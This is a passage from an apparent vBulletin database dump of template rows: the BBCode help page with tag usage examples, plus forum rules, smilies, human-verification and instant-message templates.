\r\n \r\n\r\n\") : (\"\")).\"\r\n\r\n\r\n\".(($show[\'bbcodecolor\']) ? (\"\r\n\r\n \r\n \r\n $vbphrase[color] \r\n \r\n \r\n $vbphrase[color_tag_allows] \r\n \r\n \r\n $vbphrase[usage] \r\n [color=$vbphrase[option] ]$vbphrase[value] [/color] \r\n \r\n \r\n $vbphrase[example_usage] \r\n [color=blue]$vbphrase[this_text_is_blue][/color] \r\n \r\n \r\n $vbphrase[example_output] \r\n $vbphrase[this_text_is_blue] \r\n \r\n
\r\n \r\n\r\n\") : (\"\")).\"\r\n\r\n\".(($show[\'bbcodesize\']) ? (\"\r\n\r\n \r\n \r\n $vbphrase[size] \r\n \r\n \r\n $vbphrase[size_tag_allows] \r\n \r\n \r\n $vbphrase[usage] \r\n [size=$vbphrase[option] ]$vbphrase[value] [/size] \r\n \r\n \r\n $vbphrase[example_usage] \r\n [size=+2]$vbphrase[text_two_sizes_larger_than_normal][/size] \r\n \r\n \r\n $vbphrase[example_output] \r\n $vbphrase[text_two_sizes_larger_than_normal] \r\n \r\n
\r\n \r\n\r\n\") : (\"\")).\"\r\n\r\n\".(($show[\'bbcodefont\']) ? (\"\r\n\r\n \r\n \r\n $vbphrase[font] \r\n \r\n \r\n $vbphrase[font_tag_allows] \r\n \r\n \r\n $vbphrase[usage] \r\n [font=$vbphrase[option] ]$vbphrase[value] [/font] \r\n \r\n \r\n $vbphrase[example_usage] \r\n [font=courier]$vbphrase[this_text_is_courier_font][/font] \r\n \r\n \r\n $vbphrase[example_output] \r\n $vbphrase[this_text_is_courier_font] \r\n \r\n
\r\n \r\n\r\n\") : (\"\")).\"\r\n\r\n\r\n\r\n $vbphrase[highlight] \r\n \r\n\r\n $vbphrase[highlight_tag_allows] \r\n \r\n\r\n $vbphrase[usage] \r\n [highlight]$vbphrase[value] [/highlight] \r\n \r\n\r\n $vbphrase[example_usage] \r\n [highlight]$vbphrase[this_text_is_highlighted][/highlight] \r\n \r\n\r\n $vbphrase[example_output] \r\n $vbphrase[this_text_is_highlighted] \r\n \r\n
\r\n \r\n\r\n\".(($show[\'bbcodealign\']) ? (\"\r\n\r\n \r\n \r\n $vbphrase[left] / $vbphrase[right] / $vbphrase[center] \r\n \r\n \r\n $vbphrase[left_right_and_center_tags_allow] \r\n \r\n \r\n $vbphrase[usage] \r\n \r\n [left]$vbphrase[value] [/left] \r\n [center]$vbphrase[value] [/center] \r\n [right]$vbphrase[value] [/right]\r\n \r\n \r\n \r\n $vbphrase[example_usage] \r\n \r\n [left]$vbphrase[this_text_is_left_aligned][/left] \r\n [center]$vbphrase[this_text_is_center_aligned][/center] \r\n [right]$vbphrase[this_text_is_right_aligned][/right]\r\n \r\n \r\n \r\n $vbphrase[example_output] \r\n \r\n $vbphrase[this_text_is_left_aligned]
\r\n $vbphrase[this_text_is_center_aligned]
\r\n $vbphrase[this_text_is_right_aligned]
\r\n \r\n \r\n
\r\n \r\n\r\n \r\n \r\n $vbphrase[indent] \r\n \r\n \r\n $vbphrase[indent_tag_allows] \r\n \r\n \r\n $vbphrase[usage] \r\n [indent]$vbphrase[value] [/indent] \r\n \r\n \r\n $vbphrase[example_usage] \r\n [indent]$vbphrase[this_text_is_indented][/indent] \r\n \r\n \r\n $vbphrase[example_output] \r\n $vbphrase[this_text_is_indented]
\r\n \r\n
\r\n \r\n\r\n\") : (\"\")).\"\r\n\r\n\".(($show[\'bbcodeurl\']) ? (\"\r\n\r\n \r\n \r\n $vbphrase[email_linking] \r\n \r\n \r\n $vbphrase[email_tag_allows] \r\n \r\n \r\n $vbphrase[usage] \r\n \r\n [email]$vbphrase[value] [/email] \r\n [email=$vbphrase[option] ]$vbphrase[value] [/email]\r\n \r\n \r\n \r\n $vbphrase[example_usage] \r\n \r\n [email]j.doe@example.com[/email] \r\n [email=j.doe@example.com]$vbphrase[click_here_to_email_me][/email]\r\n \r\n \r\n \r\n $vbphrase[example_output] \r\n \r\n j.doe@example.com \r\n $vbphrase[click_here_to_email_me] \r\n \r\n \r\n
\r\n \r\n\r\n \r\n \r\n\r\n \r\n \r\n\r\n \r\n \r\n\r\n\") : (\"\")).\"\r\n\r\n\".(($show[\'bbcodelist\']) ? (\"\r\n\r\n \r\n \r\n $vbphrase[bulleted_lists] \r\n \r\n \r\n $vbphrase[list_tag_allows] \r\n \r\n \r\n $vbphrase[usage] \r\n [list]$vbphrase[value] [/list] \r\n \r\n \r\n $vbphrase[example_usage] \r\n [list] [*]$vbphrase[list_item_1] [*]$vbphrase[list_item_2] [/list] \r\n \r\n \r\n $vbphrase[example_output] \r\n $vbphrase[list_item_1] $vbphrase[list_item_2] \r\n \r\n
\r\n \r\n\r\n \r\n \r\n $vbphrase[advanced_lists] \r\n \r\n \r\n $vbphrase[list_tag_allows_advanced] \r\n \r\n \r\n $vbphrase[usage] \r\n [list=$vbphrase[option] ]$vbphrase[value] [/list] \r\n \r\n \r\n $vbphrase[example_usage] \r\n [list=1] [*]$vbphrase[list_item_1] [*]$vbphrase[list_item_2] [/list] [list=a] [*]$vbphrase[list_item_1] [*]$vbphrase[list_item_2] [/list] \r\n \r\n \r\n $vbphrase[example_output] \r\n $vbphrase[list_item_1] $vbphrase[list_item_2] $vbphrase[list_item_1] $vbphrase[list_item_2] \r\n \r\n
\r\n \r\n\r\n\") : (\"\")).\"\r\n\r\n\r\n\r\n $vbphrase[images] \r\n \r\n\r\n $vbphrase[img_tag_allows] \r\n \r\n\r\n $vbphrase[usage] \r\n [img]$vbphrase[value] [/img] \r\n \r\n\r\n $vbphrase[example_usage] \r\n \r\n [img]$statusicon_dir/forum_new.gif[/img] ($vbphrase[not_linked]) \r\n \r\n [url=http://www.example.com] [img]$statusicon_dir/forum_new.gif[/img] [/url] ($vbphrase[linked])\r\n \r\n \r\n\r\n $vbphrase[example_output] \r\n \r\n ($vbphrase[not_linked]) \r\n \r\n ($vbphrase[linked])\r\n \r\n \r\n
\r\n \r\n\r\n\".(($show[\'bbcodecode\']) ? (\"\r\n\r\n \r\n \r\n $vbphrase[code] \r\n \r\n \r\n $vbphrase[code_tag_switches] \r\n \r\n \r\n $vbphrase[usage] \r\n [code]$vbphrase[value] [/code] \r\n \r\n \r\n $vbphrase[example_usage] \r\n [code] \r\n <script type="text/javascript"> \r\n <!-- \r\n alert("Hello world!"); \r\n //--> \r\n </script> \r\n [/code] \r\n \r\n \r\n $vbphrase[example_output] \r\n $specialbbcode[code] \r\n \r\n
\r\n \r\n\r\n\") : (\"\")).\"\r\n\r\n\".(($show[\'bbcodephp\']) ? (\"\r\n\r\n \r\n \r\n $vbphrase[php_code] \r\n \r\n \r\n $vbphrase[php_tag_performs] \r\n \r\n \r\n $vbphrase[usage] \r\n [php]$vbphrase[value] [/php] \r\n \r\n \r\n $vbphrase[example_usage] \r\n [php] \r\n \\$myvar = \'Hello World!\'; \r\n for ($ i = 0; \\$i < 10; \\$i++) \r\n { \r\n echo \\$myvar . "\\\\n"; \r\n } \r\n [/php] \r\n \r\n \r\n $vbphrase[example_output] \r\n $specialbbcode[php] \r\n \r\n
\r\n \r\n\r\n\") : (\"\")).\"\r\n\r\n\".(($show[\'bbcodehtml\']) ? (\"\r\n\r\n \r\n \r\n $vbphrase[html_code] \r\n \r\n \r\n $vbphrase[html_tag_allows] \r\n \r\n \r\n $vbphrase[usage] \r\n [html]$vbphrase[value] [/html] \r\n \r\n \r\n $vbphrase[example_usage] \r\n [html] <img src="image.gif" alt="image" /> <a href="testing.html" target="_blank">Testing</a> [/html] \r\n \r\n \r\n $vbphrase[example_output] \r\n $specialbbcode[html] \r\n \r\n
\r\n \r\n\r\n\") : (\"\")).\"\r\n\r\n\r\n\r\n $vbphrase[quote] \r\n \r\n\r\n $vbphrase[quote_tag_allows] \r\n \r\n\r\n $vbphrase[usage] \r\n \r\n [quote]$vbphrase[quote] [/quote] \r\n [quote=$vbphrase[username] ]$vbphrase[value] [/quote]\r\n \r\n \r\n\r\n $vbphrase[example_usage] \r\n \r\n [quote]Lorem ipsum dolor sit amet[/quote] \r\n [quote=John Doe]Lorem ipsum dolor sit amet[/quote] \r\n [quote=John Doe;{$max_post[maxpostid]}]Lorem ipsum dolor sit amet[/quote]\r\n \r\n \r\n\r\n $vbphrase[example_output] \r\n \r\n $specialbbcode[quote1]\r\n $specialbbcode[quote2]\r\n $specialbbcode[quote3]\r\n \r\n \r\n
\r\n \r\n\r\n\r\n\r\n $vbphrase[stop_bbcode_parsing] \r\n \r\n\r\n $vbphrase[noparse_tag_allows] \r\n \r\n\r\n $vbphrase[usage] \r\n \r\n [noparse][b]$vbphrase[value][/b] [/noparse]\r\n \r\n \r\n\r\n $vbphrase[example_usage] \r\n \r\n [noparse][b]Lorem ipsum dolor sit amet[/b][/noparse]\r\n \r\n \r\n\r\n $vbphrase[example_output] \r\n \r\n [b]Lorem ipsum dolor sit amet[/b]\r\n \r\n \r\n
\r\n \r\n\r\n\r\n\r\n $vbphrase[attachment] \r\n \r\n\r\n $vbphrase[attach_tag_allows] \r\n \r\n\r\n $vbphrase[usage] \r\n \r\n [attach]$vbphrase[attachmentid] [/attach]\r\n \r\n \r\n\r\n $vbphrase[example_usage] \r\n \r\n [attach]12345[/attach]\r\n \r\n \r\n\r\n $vbphrase[example_output] \r\n \r\n\r\n \r\n \r\n
\r\n \r\n\r\n\".(($show[\'bbcodesigpic\']) ? (\"\r\n \r\n \r\n $vbphrase[signature_picture] \r\n \r\n \r\n $vbphrase[sigpic_tag_allows] \r\n \r\n \r\n $vbphrase[usage] \r\n \r\n [sigpic]$vbphrase[signature_picture_description] [/sigpic]\r\n \r\n \r\n \r\n $vbphrase[example_usage] \r\n \r\n [sigpic][/sigpic]\r\n \r\n \r\n \r\n $vbphrase[example_output] \r\n \r\n\r\n \r\n \r\n
\r\n \r\n\") : (\"\")).\"\r\n\r\n$template[bbcodebits]\r\n\r\n\r\n\r\n$footer\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$vboptions[bbtitle] - $vbphrase[bbcode_list] \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n\r\n $vbphrase[bb_code] \r\n \r\n\r\n \r\n $vbphrase[bb_code_based_on_html]\r\n \r\n \r\n\r\n $vbphrase[bbcode_list] \r\n \r\n\r\n \r\n [b] , [i] , [u] \r\n $vbphrase[bold] / $vbphrase[italic] / $vbphrase[underline] \r\n \r\n \r\n\r\n \r\n [color] \r\n $vbphrase[color] \r\n \r\n \r\n\r\n \r\n [size] \r\n $vbphrase[size] \r\n \r\n \r\n\r\n \r\n [font] \r\n $vbphrase[font] \r\n \r\n \r\n\r\n [highlight] \r\n $vbphrase[highlight] \r\n \r\n\r\n \r\n [left] , [right] , [center] \r\n $vbphrase[left] / $vbphrase[right] / $vbphrase[center] \r\n \r\n \r\n [indent] \r\n $vbphrase[indent] \r\n \r\n \r\n\r\n \r\n [email] \r\n $vbphrase[email_linking] \r\n \r\n \r\n [url] \r\n $vbphrase[url_hyperlinking] \r\n \r\n \r\n [thread] \r\n $vbphrase[thread_linking] \r\n \r\n \r\n [post] \r\n $vbphrase[post_linking] \r\n \r\n \r\n\r\n \r\n [list] \r\n $vbphrase[bulleted_lists] / $vbphrase[advanced_lists] \r\n \r\n \r\n\r\n [img] \r\n $vbphrase[images] \r\n \r\n\r\n \r\n [code] \r\n $vbphrase[code] \r\n \r\n \r\n\r\n \r\n [php] \r\n $vbphrase[php_code] \r\n \r\n \r\n\r\n \r\n [html] \r\n $vbphrase[html_code] \r\n \r\n \r\n\r\n [quote] \r\n $vbphrase[quote] \r\n \r\n\r\n [noparse] \r\n $vbphrase[stop_bbcode_parsing] \r\n \r\n\r\n [attach] \r\n $vbphrase[attachment] \r\n \r\n\r\n \r\n [sigpic] \r\n $vbphrase[signature_picture] \r\n \r\n \r\n$template[bbcodelinks]\r\n\r\n \r\n $vbphrase[incorrect_bb_code_usage]\r\n \r\n \r\n
\r\n\r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n \r\n $vbphrase[bold] / $vbphrase[italic] / $vbphrase[underline] \r\n \r\n \r\n $vbphrase[b_i_and_u_tags_allow] \r\n \r\n \r\n $vbphrase[usage] \r\n \r\n [b]$vbphrase[value] [/b] \r\n [i]$vbphrase[value] [/i] \r\n [u]$vbphrase[value] [/u]\r\n \r\n \r\n \r\n $vbphrase[example_usage] \r\n \r\n [b]$vbphrase[this_text_is_bold][/b] \r\n [i]$vbphrase[this_text_is_italic][/i] \r\n [u]$vbphrase[this_text_is_underlined][/u]\r\n \r\n \r\n \r\n $vbphrase[example_output] \r\n \r\n $vbphrase[this_text_is_bold] \r\n $vbphrase[this_text_is_italic] \r\n $vbphrase[this_text_is_underlined] \r\n \r\n \r\n
\r\n \r\n\r\n \r\n\r\n\r\n\r\n\r\n \r\n \r\n $vbphrase[color] \r\n \r\n \r\n $vbphrase[color_tag_allows] \r\n \r\n \r\n $vbphrase[usage] \r\n [color=$vbphrase[option] ]$vbphrase[value] [/color] \r\n \r\n \r\n $vbphrase[example_usage] \r\n [color=blue]$vbphrase[this_text_is_blue][/color] \r\n \r\n \r\n $vbphrase[example_output] \r\n $vbphrase[this_text_is_blue] \r\n \r\n
\r\n \r\n\r\n \r\n\r\n\r\n\r\n \r\n \r\n $vbphrase[size] \r\n \r\n \r\n $vbphrase[size_tag_allows] \r\n \r\n \r\n $vbphrase[usage] \r\n [size=$vbphrase[option] ]$vbphrase[value] [/size] \r\n \r\n \r\n $vbphrase[example_usage] \r\n [size=+2]$vbphrase[text_two_sizes_larger_than_normal][/size] \r\n \r\n \r\n $vbphrase[example_output] \r\n $vbphrase[text_two_sizes_larger_than_normal] \r\n \r\n
\r\n \r\n\r\n \r\n\r\n\r\n\r\n \r\n \r\n $vbphrase[font] \r\n \r\n \r\n $vbphrase[font_tag_allows] \r\n \r\n \r\n $vbphrase[usage] \r\n [font=$vbphrase[option] ]$vbphrase[value] [/font] \r\n \r\n \r\n $vbphrase[example_usage] \r\n [font=courier]$vbphrase[this_text_is_courier_font][/font] \r\n \r\n \r\n $vbphrase[example_output] \r\n $vbphrase[this_text_is_courier_font] \r\n \r\n
\r\n \r\n\r\n \r\n\r\n\r\n\r\n $vbphrase[highlight] \r\n \r\n\r\n $vbphrase[highlight_tag_allows] \r\n \r\n\r\n $vbphrase[usage] \r\n [highlight]$vbphrase[value] [/highlight] \r\n \r\n\r\n $vbphrase[example_usage] \r\n [highlight]$vbphrase[this_text_is_highlighted][/highlight] \r\n \r\n\r\n $vbphrase[example_output] \r\n $vbphrase[this_text_is_highlighted] \r\n \r\n
\r\n \r\n\r\n\r\n\r\n \r\n \r\n $vbphrase[left] / $vbphrase[right] / $vbphrase[center] \r\n \r\n \r\n $vbphrase[left_right_and_center_tags_allow] \r\n \r\n \r\n $vbphrase[usage] \r\n \r\n [left]$vbphrase[value] [/left] \r\n [center]$vbphrase[value] [/center] \r\n [right]$vbphrase[value] [/right]\r\n \r\n \r\n \r\n $vbphrase[example_usage] \r\n \r\n [left]$vbphrase[this_text_is_left_aligned][/left] \r\n [center]$vbphrase[this_text_is_center_aligned][/center] \r\n [right]$vbphrase[this_text_is_right_aligned][/right]\r\n \r\n \r\n \r\n $vbphrase[example_output] \r\n \r\n $vbphrase[this_text_is_left_aligned]
\r\n $vbphrase[this_text_is_center_aligned]
\r\n $vbphrase[this_text_is_right_aligned]
\r\n \r\n \r\n
\r\n \r\n\r\n \r\n \r\n $vbphrase[indent] \r\n \r\n \r\n $vbphrase[indent_tag_allows] \r\n \r\n \r\n $vbphrase[usage] \r\n [indent]$vbphrase[value] [/indent] \r\n \r\n \r\n $vbphrase[example_usage] \r\n [indent]$vbphrase[this_text_is_indented][/indent] \r\n \r\n \r\n $vbphrase[example_output] \r\n $vbphrase[this_text_is_indented]
\r\n \r\n
\r\n \r\n\r\n \r\n\r\n\r\n\r\n \r\n \r\n $vbphrase[email_linking] \r\n \r\n \r\n $vbphrase[email_tag_allows] \r\n \r\n \r\n $vbphrase[usage] \r\n \r\n [email]$vbphrase[value] [/email] \r\n [email=$vbphrase[option] ]$vbphrase[value] [/email]\r\n \r\n \r\n \r\n $vbphrase[example_usage] \r\n \r\n [email]j.doe@example.com[/email] \r\n [email=j.doe@example.com]$vbphrase[click_here_to_email_me][/email]\r\n \r\n \r\n \r\n $vbphrase[example_output] \r\n \r\n j.doe@example.com \r\n $vbphrase[click_here_to_email_me] \r\n \r\n \r\n
\r\n \r\n\r\n \r\n \r\n $vbphrase[url_hyperlinking] \r\n \r\n \r\n $vbphrase[url_tag_allows] \r\n \r\n \r\n $vbphrase[usage] \r\n \r\n [url]$vbphrase[value] [/url] \r\n [url=$vbphrase[option] ]$vbphrase[value] [/url]\r\n \r\n \r\n \r\n $vbphrase[example_usage] \r\n \r\n [url]$vboptions[bburl][/url] \r\n [url=$vboptions[bburl]]$vboptions[bbtitle][/url]\r\n \r\n \r\n \r\n $vbphrase[example_output] \r\n \r\n $vboptions[bburl] \r\n $vboptions[bbtitle] \r\n \r\n \r\n
\r\n \r\n\r\n \r\n \r\n $vbphrase[thread_linking] \r\n \r\n \r\n $vbphrase[thread_tag_allows] \r\n \r\n \r\n $vbphrase[usage] \r\n \r\n [thread]$vbphrase[threadid] [/thread] \r\n [thread=$vbphrase[threadid] ]$vbphrase[value] [/thread]\r\n \r\n \r\n \r\n $vbphrase[example_usage] \r\n \r\n [thread]42918[/thread] \r\n [thread=42918]$vbphrase[click_me][/thread]\r\n $vbphrase[note_the_id_is_just_an_example] \r\n \r\n \r\n \r\n $vbphrase[example_output] \r\n \r\n $vboptions[bburl]/showthread.php?t=42918 \r\n $vbphrase[vbulletin_forums_thread_42918]\">$vbphrase[click_me] \r\n \r\n \r\n
\r\n \r\n\r\n \r\n \r\n\r\n \r\n\r\n\r\n\r\n \r\n \r\n $vbphrase[bulleted_lists] \r\n \r\n \r\n $vbphrase[list_tag_allows] \r\n \r\n \r\n $vbphrase[usage] \r\n [list]$vbphrase[value] [/list] \r\n \r\n \r\n $vbphrase[example_usage] \r\n [list] [*]$vbphrase[list_item_1] [*]$vbphrase[list_item_2] [/list] \r\n \r\n \r\n $vbphrase[example_output] \r\n $vbphrase[list_item_1] $vbphrase[list_item_2] \r\n \r\n
\r\n \r\n\r\n \r\n \r\n $vbphrase[advanced_lists] \r\n \r\n \r\n $vbphrase[list_tag_allows_advanced] \r\n \r\n \r\n $vbphrase[usage] \r\n [list=$vbphrase[option] ]$vbphrase[value] [/list] \r\n \r\n \r\n $vbphrase[example_usage] \r\n [list=1] [*]$vbphrase[list_item_1] [*]$vbphrase[list_item_2] [/list] [list=a] [*]$vbphrase[list_item_1] [*]$vbphrase[list_item_2] [/list] \r\n \r\n \r\n $vbphrase[example_output] \r\n $vbphrase[list_item_1] $vbphrase[list_item_2] $vbphrase[list_item_1] $vbphrase[list_item_2] \r\n \r\n
\r\n \r\n\r\n \r\n\r\n\r\n\r\n $vbphrase[images] \r\n \r\n\r\n $vbphrase[img_tag_allows] \r\n \r\n\r\n $vbphrase[usage] \r\n [img]$vbphrase[value] [/img] \r\n \r\n\r\n $vbphrase[example_usage] \r\n \r\n [img]$statusicon_dir/forum_new.gif[/img] ($vbphrase[not_linked]) \r\n \r\n [url=http://www.example.com] [img]$statusicon_dir/forum_new.gif[/img] [/url] ($vbphrase[linked])\r\n \r\n \r\n\r\n $vbphrase[example_output] \r\n \r\n ($vbphrase[not_linked]) \r\n \r\n ($vbphrase[linked])\r\n \r\n \r\n
\r\n \r\n\r\n\r\n\r\n \r\n \r\n $vbphrase[code] \r\n \r\n \r\n $vbphrase[code_tag_switches] \r\n \r\n \r\n $vbphrase[usage] \r\n [code]$vbphrase[value] [/code] \r\n \r\n \r\n $vbphrase[example_usage] \r\n [code] \r\n <script type="text/javascript"> \r\n <!-- \r\n alert("Hello world!"); \r\n //--> \r\n </script> \r\n [/code] \r\n \r\n \r\n $vbphrase[example_output] \r\n $specialbbcode[code] \r\n \r\n
\r\n \r\n\r\n \r\n\r\n\r\n\r\n \r\n \r\n $vbphrase[php_code] \r\n \r\n \r\n $vbphrase[php_tag_performs] \r\n \r\n \r\n $vbphrase[usage] \r\n [php]$vbphrase[value] [/php] \r\n \r\n \r\n $vbphrase[example_usage] \r\n [php] \r\n \\$myvar = \'Hello World!\'; \r\n for ($ i = 0; \\$i < 10; \\$i++) \r\n { \r\n echo \\$myvar . "\\n"; \r\n } \r\n [/php] \r\n \r\n \r\n $vbphrase[example_output] \r\n $specialbbcode[php] \r\n \r\n
\r\n \r\n\r\n \r\n\r\n\r\n\r\n \r\n \r\n $vbphrase[html_code] \r\n \r\n \r\n $vbphrase[html_tag_allows] \r\n \r\n \r\n $vbphrase[usage] \r\n [html]$vbphrase[value] [/html] \r\n \r\n \r\n $vbphrase[example_usage] \r\n [html] <img src="image.gif" alt="image" /> <a href="testing.html" target="_blank">Testing</a> [/html] \r\n \r\n \r\n $vbphrase[example_output] \r\n $specialbbcode[html] \r\n \r\n
\r\n \r\n\r\n \r\n\r\n\r\n\r\n $vbphrase[quote] \r\n \r\n\r\n $vbphrase[quote_tag_allows] \r\n \r\n\r\n $vbphrase[usage] \r\n \r\n [quote]$vbphrase[quote] [/quote] \r\n [quote=$vbphrase[username] ]$vbphrase[value] [/quote]\r\n \r\n \r\n\r\n $vbphrase[example_usage] \r\n \r\n [quote]Lorem ipsum dolor sit amet[/quote] \r\n [quote=John Doe]Lorem ipsum dolor sit amet[/quote] \r\n [quote=John Doe;{$max_post[maxpostid]}]Lorem ipsum dolor sit amet[/quote]\r\n \r\n \r\n\r\n $vbphrase[example_output] \r\n \r\n $specialbbcode[quote1]\r\n $specialbbcode[quote2]\r\n $specialbbcode[quote3]\r\n \r\n \r\n
\r\n \r\n\r\n\r\n\r\n $vbphrase[stop_bbcode_parsing] \r\n \r\n\r\n $vbphrase[noparse_tag_allows] \r\n \r\n\r\n $vbphrase[usage] \r\n \r\n [noparse][b]$vbphrase[value][/b] [/noparse]\r\n \r\n \r\n\r\n $vbphrase[example_usage] \r\n \r\n [noparse][b]Lorem ipsum dolor sit amet[/b][/noparse]\r\n \r\n \r\n\r\n $vbphrase[example_output] \r\n \r\n [b]Lorem ipsum dolor sit amet[/b]\r\n \r\n \r\n
\r\n \r\n\r\n\r\n\r\n $vbphrase[attachment] \r\n \r\n\r\n $vbphrase[attach_tag_allows] \r\n \r\n\r\n $vbphrase[usage] \r\n \r\n [attach]$vbphrase[attachmentid] [/attach]\r\n \r\n \r\n\r\n $vbphrase[example_usage] \r\n \r\n [attach]12345[/attach]\r\n \r\n \r\n\r\n $vbphrase[example_output] \r\n \r\n\r\n \r\n \r\n
\r\n \r\n\r\n\r\n \r\n \r\n $vbphrase[signature_picture] \r\n \r\n \r\n $vbphrase[sigpic_tag_allows] \r\n \r\n \r\n $vbphrase[usage] \r\n \r\n [sigpic]$vbphrase[signature_picture_description] [/sigpic]\r\n \r\n \r\n \r\n $vbphrase[example_usage] \r\n \r\n [sigpic][/sigpic]\r\n \r\n \r\n \r\n $vbphrase[example_output] \r\n \r\n\r\n \r\n \r\n
\r\n \r\n \r\n\r\n$template[bbcodebits]\r\n\r\n\r\n\r\n$footer\r\n\r\n\r\n', 'template', 1206965077, 'vBulletin Solutions', '3.7.0 Release Candidate 2', 'vbulletin'),
(1337, -1, 'help_bbcodes_bbcode', '\r\n\r\n $bbcode[title] \r\n \r\n\r\n $bbcode[bbcodeexplanation] \r\n \r\n\r\n $vbphrase[usage] \r\n $bbcode[tag] \r\n \r\n\r\n $vbphrase[example_usage] \r\n $bbcode[bbcodeexample] \r\n \r\n\r\n $vbphrase[example_output] \r\n $bbcode[output] \r\n \r\n
\r\n \r\n', '\r\n\r\n $bbcode[title] \r\n \r\n\r\n $bbcode[bbcodeexplanation] \r\n \r\n\r\n $vbphrase[usage] \r\n $bbcode[tag] \r\n \r\n\r\n $vbphrase[example_usage] \r\n $bbcode[bbcodeexample] \r\n \r\n\r\n $vbphrase[example_output] \r\n $bbcode[output] \r\n \r\n
\r\n \r\n', 'template', 1100648588, 'vBulletin Solutions', '', 'vbulletin'),
(1338, -1, 'help_bbcodes_link', '\r\n [$bbcode[bbcodetag]] \r\n $bbcode[title] \r\n \r\n', '\r\n [$bbcode[bbcodetag]] \r\n $bbcode[title] \r\n \r\n', 'template', 1069971135, 'vBulletin Solutions', '', 'vbulletin'),
(1339, -1, 'help_rules', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $vbphrase[forum_rules] \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n \r\n \" . construct_phrase(\"$vbphrase[x_rules]\", \"\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \"\") . \" \r\n \r\n\r\n \r\n \" . construct_phrase(\"$vbphrase[forum_rules_description]\", \"\" . $GLOBALS[\'vbulletin\']->options[\'forumhome\'] . \".php\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl_q\'] . \"\", \"\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \"\") . \"\r\n \r\n \r\n
\r\n\r\n$footer\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$vboptions[bbtitle] - $vbphrase[forum_rules] \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n \r\n $vbphrase[x_rules] \r\n \r\n\r\n \r\n $vbphrase[forum_rules_description] \r\n \r\n \r\n
\r\n\r\n$footer\r\n\r\n\r\n', 'template', 1233660520, 'vBulletin Solutions', '3.8.2', 'vbulletin'),
(1340, -1, 'help_smilies', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $vbphrase[smilies] \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n\r\n $vbphrase[smilies] \r\n \r\n\r\n \r\n $vbphrase[smilies_are_small_images]\r\n \r\n \r\n
\r\n\r\n \r\n\r\n\r\n\r\n$footer\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$vboptions[bbtitle] - $vbphrase[smilies] \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n\r\n $vbphrase[smilies] \r\n \r\n\r\n \r\n $vbphrase[smilies_are_small_images]\r\n \r\n \r\n
\r\n\r\n \r\n\r\n\r\n\r\n$footer\r\n\r\n\r\n', 'template', 1195729860, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'),
(1341, -1, 'help_smilies_category', '\r\n $smilie[category] \r\n \r\n\r\n $vbphrase[what_to_type] \r\n $vbphrase[resulting_graphic] \r\n $vbphrase[meaning] \r\n \r\n', '\r\n $smilie[category] \r\n \r\n\r\n $vbphrase[what_to_type] \r\n $vbphrase[resulting_graphic] \r\n $vbphrase[meaning] \r\n \r\n', 'template', 1070057655, 'vBulletin Solutions', '', 'vbulletin'),
(1342, -1, 'help_smilies_smilie', '\r\n $smilie[smilietext] \r\n \r\n $smilie[title] \r\n \r\n', '\r\n $smilie[smilietext] \r\n \r\n $smilie[title] \r\n \r\n', 'template', 1069241025, 'vBulletin Solutions', '', 'vbulletin'),
(1343, -1, 'humanverify_image', '\r\n $vbphrase[image_verification] \r\n \r\n \r\n\r\n', '\r\n $vbphrase[image_verification] \r\n \r\n \r\n\r\n', 'template', 1192468486, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'),
(1344, -1, 'humanverify_question', '\".(($humanverify[\'answer\']) ? (\"\r\n\r\n $vbphrase[random_question] \r\n \r\n \r\n\") : (\"\r\n \r\n\")).\"', '\r\n\r\n $vbphrase[random_question] \r\n \r\n \r\n \r\n \r\n ', 'template', 1197980516, 'vBulletin Solutions', '3.7.0 Beta 3', 'vbulletin'),
(1345, -1, 'humanverify_recaptcha', '\r\n $vbphrase[image_verification] \r\n \r\n \r\n \r\n \".(($show[\'recaptcha_ssl\']) ? (\"\r\n \r\n
\r\n\r\n \r\n \".(($show[\'recaptcha_ssl\']) ? (\"\r\n \r\n \") : (\"\r\n \r\n \")).\"\r\n \r\n \r\n \r\n \r\n \r\n ', '\r\n $vbphrase[image_verification] \r\n \r\n \r\n \r\n \r\n \r\n
\r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n ', 'template', 1212486891, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'),
(1346, -1, 'im_aim', ' ', ' $vbphrase[send_message_via_aim_to_x]\" border=\"0\" /> ', 'template', 1119876670, 'vBulletin Solutions', '3.5.0 Beta 3', 'vbulletin'),
(1347, -1, 'im_icq', ' ', ' $vbphrase[send_message_via_icq_to_x]\" border=\"0\" /> ', 'template', 1119876683, 'vBulletin Solutions', '3.5.0 Beta 3', 'vbulletin'),
(1348, -1, 'im_message', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\" . construct_phrase(\"$vbphrase[send_message_via_x_to_y]\", \"$typetext\", \"$userinfo[username]\") . \" - \" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" \r\n\r\n\r\n\r\n$imtext\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$vbphrase[send_message_via_x_to_y] - $vboptions[bbtitle] \r\n\r\n\r\n\r\n$imtext\r\n\r\n\r\n', 'template', 1195729860, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'),
